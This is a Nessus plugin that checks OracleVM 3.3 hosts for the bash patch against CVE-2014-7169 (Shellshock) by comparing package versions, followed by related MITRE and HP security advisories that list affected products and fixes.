ID ORACLEVM_OVMSA-2014-0021.NASL Type nessus Reporter This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2022-01-31T00:00:00
Description
The remote OracleVM system is missing patches necessary to address critical security updates:
- (CVE-2014-7169) Resolves: #1146322
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The package checks in this plugin were extracted from OracleVM
# Security Advisory OVMSA-2014-0021.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration stanza. When the scanner evaluates the plugin with `description`
# set, only the metadata below is recorded and the stanza ends at exit(0), so
# none of the package checks further down run in that mode.
if (description)
{
  # --- Identity ---
  script_id(78237);
  script_version("1.17");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/01/31");

  # --- Vulnerability references ---
  # CVE-2014-7169 is the only CVE registered here. A "not affected" result
  # from this plugin therefore says nothing about other bash CVEs; those need
  # their own checks.
  script_cve_id("CVE-2014-7169");
  script_bugtraq_id(70137);
  # Cross-reference into CISA's known-exploited list.
  # NOTE(review): the value is a date, presumably the catalog due date - confirm.
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/07/28");

  # --- Text shown in scan results ---
  script_name(english:"OracleVM 3.3 : bash (OVMSA-2014-0021)");
  script_set_attribute(attribute:"synopsis", value:"The remote OracleVM host is missing a security update.");
  script_set_attribute(attribute:"description", value:"The remote OracleVM system is missing necessary patches to address
critical security updates :
- (CVE-2014-7169) Resolves: #1146322");
  # Advisory reference kept from the original plugin source:
  # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000222.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dadbd467");
  script_set_attribute(attribute:"solution", value:"Update the affected bash package.");

  # --- Scoring ---
  # CVSS v2 base: network reachable, low complexity, no authentication,
  # complete impact on confidentiality, integrity and availability.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  # CVSS v2 temporal: proof-of-concept exploit, official fix, confirmed report.
  # NOTE(review): E:POC sits beside a CISA-KNOWN-EXPLOITED xref above; for
  # triage, weigh the known-exploited marker rather than the temporal vector.
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # --- Timeline ---
  script_set_attribute(attribute:"vuln_publication_date", value:"2014/09/24");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/09/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/10/10");

  # --- Scope ---
  # "local" plugin type: the verdict comes from data collected on the host
  # itself (see the dependency and required KB keys below), not from probing
  # a network service.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:bash");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.3");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  # --- Scheduling ---
  script_category(ACT_GATHER_INFO);
  script_family(english:"OracleVM Local Security Checks");
  script_copyright(english:"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # The plugin depends on ssh_get_info.nasl and requires these three KB keys.
  # Without working credentialed access the keys are absent, and the plugin
  # yields no verdict in that case rather than a "safe" one.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/OracleVM/release", "Host/OracleVM/rpm-list");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Package-inventory check for the bash update named in OVMSA-2014-0021.
#
# Every decision below is made from knowledge-base entries (release string,
# CPU, RPM list); nothing here executes or probes bash on the target. The
# verdict is therefore only as good as the stored package list.
# NOTE(review): a bash binary that is not tracked in the RPM list would not be
# seen by this check - confirm against rpm.inc if that matters for your estate.
#
# audit() comes from audit.inc, which is not shown here; the guards below only
# make sense if it terminates the script - TODO confirm.

# Guard 1: local (credentialed) checks must be enabled.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}

# Guard 2: the host must identify as OracleVM ("OVS" in the release string)...
release = get_kb_item("Host/OracleVM/release");
if (isnull(release) || "OVS" >!< release)
{
  audit(AUDIT_OS_NOT, "OracleVM");
}

# ...and specifically as release 3.3, optionally followed by ".<digit>".
if (! preg(pattern:"^OVS" + "3\.3" + "(\.[0-9]|$)", string:release))
{
  audit(AUDIT_OS_NOT, "OracleVM 3.3", "OracleVM " + release);
}

# Guard 3: an RPM list must have been collected for this host.
if (!get_kb_item("Host/OracleVM/rpm-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Guard 4: architecture. Unknown CPU and non-x86 CPUs are rejected first,
# then anything that is not x86_64 (so 32-bit x86 is reported as the wrong
# architecture rather than as unsupported).
cpu = get_kb_item("Host/cpu");
if (isnull(cpu))
{
  audit(AUDIT_UNKNOWN_ARCH);
}
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$")
{
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "OracleVM", cpu);
}
if ("x86_64" >!< cpu)
{
  audit(AUDIT_ARCH_NOT, "x86_64", cpu);
}

# Compare against the reference build named in the advisory.
# NOTE(review): rpm_check() lives in rpm.inc (not shown); presumably it is
# true when the installed bash is older than the reference - confirm.
flag = 0;
if (rpm_check(release:"OVS3.3", reference:"bash-4.1.2-15.el6_5.2"))
{
  flag++;
}

if (!flag)
{
  # Nothing flagged: distinguish "bash was examined" from "bash was never
  # found in the package list" so the audit trail states which one applied.
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "bash");
}
else
{
  # Flagged: raise the finding on port 0, attaching the RPM report text only
  # when the scan's report verbosity is above zero.
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nMITRE is currently using CVE-2014-7169 to track the report of the\r\nincomplete patch, i.e., incorrect function parsing that's present in\r\nbuilds that are up-to-date with the\r\nhttp://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025 changes. We\r\nrealize that other people may be releasing further information about\r\nthe technical details and implications later. CVE-2014-7169 expresses\r\nthe affected upstream versions as "GNU Bash through 4.3 bash43-025" --\r\nin general, this would include distribution packages released earlier\r\ntoday (2014-09-24).\r\n\r\n- -- \r\nCVE assignment team, MITRE CVE Numbering Authority\r\nM/S M300\r\n202 Burlington Road, Bedford, MA 01730 USA\r\n[ PGP key available through http://cve.mitre.org/cve/request_id.html ]\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (SunOS)\r\n\r\niQEcBAEBAgAGBQJUI3DaAAoJEKllVAevmvms+/kH/32ZGjC+BSqKoz6ZBUCMLnQ2\r\n+Li91/GvD0Rs8bqKPDsz30spiJR57ZluKMrlxJrlIffiHqAFiYkQ3+JXmnK/HAnA\r\nOtgToNtZ+1BV2jPrjXhuy2h+E5paTXMhM0T12xaUo89vtE7oer4Pld4JDqreXSSk\r\n1Nfu5AaGcvbBmwaNRn1qw+nARw0CFPmMRa169jQAesAAcyNx8V7IPgFpPj4K4S8c\r\n0zKXVdhIZxXvPcdZ5QzXKhcluOyOl1dJsjXR1qXT03QJsvhRighqb/3dZy+4mLyl\r\nJWhDfs7l8XXGCzbF8eSg2CNBpTGy1d/32F7YqaKj53xWFWyktHtbk4nJ5hlPlKU=\r\n=E9tp\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-09-25T00:00:00", "title": "[oss-security] Re: CVE-2014-6271: remote code execution through bash", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "SECURITYVULNS:DOC:31106", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31106", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED 
MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04467807\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04467807\r\nVersion: 1\r\n\r\nHPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System\r\n(vCAS) running Bash Shell, Remote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-30\r\nLast Updated: 2014-09-30\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Remote Device\r\nAccess: Virtual Customer Access System (vCAS) running Bash Shell . This is\r\nthe Bash Shell vulnerability known as "ShellShock" which could be exploited\r\nremotely to allow execution of code.\r\n\r\n NOTE: The vCAS product is vulnerable only if DHCP is enabled.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101724\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nvCAS version 14.06 (RDA 8.1)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions of HP Remote Device Access: Virtual Customer Access System (vCAS)\r\nrunning Bash Shell. 
This bulletin will be revised when the software update is\r\nreleased.\r\n\r\nNOTE: HP recommends to not power-down or disconnect the vCAS until the update\r\nis available.\r\n\r\nMITIGATION INFORMATION\r\n\r\nA Shellshock attack requires the definition of an environment variable\r\nintroduced into Bash. The vCAS has three attack vectors: SSH, the lighttpd\r\nweb server, and the DHCP client.\r\n\r\n - The exploit does not elevate privileges.\r\n - The SSH and webserver exploits require vCAS credentials so there is no\r\nrisk for unauthorized access or code execution through this vulnerability.\r\n\r\nThe DHCP client uses Bash scripts and is vulnerable to Shellshock. The DHCP\r\nexploit can be mitigated by ensuring that DHCP is disabled on the vCAS.\r\n\r\n Note: HP strongly discourages the use of DHCP on the vCAS.\r\n\r\nThe web UI forces the vCAS user to assign a static IP address and change the\r\nhp-admin password. A vCAS user must manually configure DHCP for use on the\r\nvCAS.\r\n\r\nA vCAS user can verify that DHCP is disabled by inspecting the file\r\n"/etc/network/interfaces" and ensuring that the "iface" line for device\r\n"eth0" is set for a static IP.\r\n\r\n Example of a static IP configuration:\r\n\r\n # The primary network interface\r\n auto eth0\r\n iface eth0 inet static\r\n address 172.27.1.68\r\n netmask 255.255.255.0\r\n gateway 172.27.1.1\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 September 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQrBP4ACgkQ4B86/C0qfVmXyQCfcKhAA0uY3dImfSwtEVk8Za3c\r\nvj4AnjNi4SmLcQFrPcGjdzRDt8U1OGS/\r\n=6Tia\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-05T00:00:00", "title": "[security bulletin] HPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System (vCAS) running Bash Shell, Remote Code Execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31135", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31135", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04471546\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04471546\r\nVersion: 1\r\n\r\nHPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-10-03\r\nLast Updated: 2014-10-03\r\n\r\nPotential Security Impact: Injection of code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with certain HP Thin\r\nClients running bash. 
The vulnerabilities, known as shellshock could be\r\nexploited remotely to allow execution of code.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101728\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nNote: all versions of HP Thin Pro and HP Smart Zero Core operating systems\r\nprior to version 5.1.0 are affected by this vulnerability. Following is a\r\ncomplete list of affected operating systems.\r\n\r\nHP ThinPro\r\n\r\nHP ThinPro 5.0 (released June 2014)\r\nHP ThinPro 4.4 (released November 2013)\r\nHP ThinPro 4.3 (released June 2013)\r\nHP ThinPro 4.2 (released November 2012)\r\nHP ThinPro 4.1 (released March 2012)\r\nHP ThinPro 3.2 (released November 2010)\r\nHP ThinPro 3.1 (released June 2010)\r\nHP ThinPro 3.0 (released November 2009)\r\nHP ThinPro 2.0 (released 2009)\r\nHP ThinPro 1.5 (released 2009)\r\nHP ThinPro 1.0 (released 2008)\r\n\r\nHP Smart Zero Core\r\n\r\nHP Smart Zero Core 5.0 (released June 2014)\r\nHP Smart Zero Core 4.4 (released November 2013)\r\nHP Smart Zero Core 4.3 (released June 2013)\r\nHP Smart Zero Core 4.2 (released November 2012)\r\nHP Smart Zero Core 4.1 (released March 2012)\r\nHP Smart Zero Core 4.0 (released March 2011)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has released the following software updates to resolve the vulnerability.\r\n\r\nProduct Affected\r\n Product Versions\r\n Patch Status\r\n\r\nHP ThinPro and HP Smart Zero Core (X86)\r\n v5.1.0 and above\r\n No update required; the Bash shell patch is incorporated into the base\r\nimage.\r\nIf you participated in the ThinPro 5.1.0 beta program upgrade to the 
release\r\nversion as soon as it becomes available.\r\n\r\nHP ThinPro and HP Smart Zero Core (x86)\r\n v5.0.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86.xar .\r\nThe update can be also downloaded directly from ftp://ftp.hp.com/pub/tcdebian\r\n/updates/5.0/service_packs/SecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86\r\n.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core (x86)\r\n v4.4.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar .\r\nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\r\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core (ARM)\r\n v4.4.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar .\r\nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\r\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core\r\n v4.3x and earlier\r\n An update will be made available for customers upon request\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 03 October 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQuzswACgkQ4B86/C0qfVlEmwCeKmjiIhep4sXipKg6EBSF8f5L\r\nmYcAnRPAcBRS9bs0c+WaszC9E7lEhSC/\r\n=dPt5\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-05T00:00:00", "title": "[security bulletin] HPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31125", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31125", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04471532\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04471532\r\nVersion: 1\r\n\r\nHPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell,\r\nRemote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-10-09\r\nLast Updated: 2014-10-09\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreAll\r\nOperating System Software running Bash Shell. 
This is the Bash Shell\r\nvulnerability known as "Shellshock" which could be exploited remotely to\r\nallow execution of code.\r\n\r\nReferences:\r\n\r\n CVE-2014-6271\r\n\r\n CVE-2014-7169\r\n\r\n SSRT101717\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreAll Operating System Software v6.5.3 and earlier.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available to resolve the\r\nvulnerability with HP StoreAll Operating System Software running Bash Shell.\r\n\r\n - HP StoreAll OS v6.5.5\r\n\r\n - HP StoreAll OS v6.3.4\r\n\r\n Note: HP StoreAll OS v6.3.4 will be available soon. This security\r\nbulletin will be revised when it is available.\r\n\r\n To request an upgrade or installation:\r\n\r\n 1. Go to: http://www.hp.com/support/storeallsoftware\r\n\r\n 2. Under Download Index, select Software, then select Obtain software.\r\n\r\n 3. Complete the software registration form, and the HP StoreAll\r\nadministrator will contact you for the next steps.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 October 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQ3EYoACgkQ4B86/C0qfVlGiwCg5w4oGFIiHcG0BQW5u4uoPxef\r\nzhMAoNKjX1w2l4V/RvE12LAfaB6he8Ak\r\n=V6d1\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-13T00:00:00", "title": "[security bulletin] HPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell, Remote Code Execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-13T00:00:00", "id": "SECURITYVULNS:DOC:31150", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31150", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04468293\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04468293\r\nVersion: 2\r\n\r\nHPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell,\r\nRemote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-30\r\nLast Updated: 2014-10-01\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP DreamColor\r\nZ27x Professional Display running Bash Shell . 
This is the Bash Shell\r\nvulnerability known as "ShellShock" which could be exploited remotely to\r\nallow execution of code.\r\n\r\nNOTE: Only the HP DreamColor Z27x model is vulnerable.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101725\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP DreamColor Z27x\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions of HP DreamColor Z27x Professional Display. The display provides\r\ncalibration and remote management functionality running on embedded Linux,\r\nwhich includes a bash shell. The shell is not accessible via the standard\r\ncalibration or remote management interfaces.\r\n\r\nThis bulletin will be revised when the firmware update is released.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 September 2014 Initial release\r\nVersion:2 (rev.2) - 1 October 2014 Clarified Resolution\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
